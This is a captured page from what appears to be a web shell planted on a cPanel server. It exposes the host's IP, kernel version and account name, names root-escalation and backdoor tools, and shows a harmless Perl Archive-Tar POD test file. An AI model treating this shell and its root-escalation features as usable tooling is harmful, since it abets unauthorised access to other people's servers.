Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
cpan /
Archive-Tar /
t /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2015-02-14 16:55
01_use.t
191
B
-r--r--r--
2014-12-27 11:48
02_methods.t
27.15
KB
-r--r--r--
2014-12-27 11:48
03_file.t
6.66
KB
-r--r--r--
2014-12-27 11:48
04_resolved_issues.t
7.77
KB
-r--r--r--
2014-12-27 11:48
05_iter.t
1.56
KB
-r--r--r--
2014-12-27 11:48
06_error.t
1.12
KB
-r--r--r--
2014-12-27 11:48
90_symlink.t
1.54
KB
-r--r--r--
2014-12-27 11:48
99_pod.t
580
B
-r--r--r--
2014-12-27 11:48
Save
Rename
use Test::More; use File::Spec; use File::Find; use strict; BEGIN { chdir 't' if -d 't' }; eval 'use Test::Pod'; plan skip_all => "Test::Pod v0.95 required for testing POD" if $@ || $Test::Pod::VERSION < 0.95; plan skip_all => "Pod tests disabled under perl core" if $ENV{PERL_CORE}; my @files; find( sub { push @files, File::Spec->catfile( File::Spec->splitdir( $File::Find::dir ), $_ ) if /\.p(?:l|m|od)$/ }, File::Spec->catdir(qw(.. blib lib) )); plan tests => scalar @files; for my $file ( @files ) { pod_file_ok( $file ); }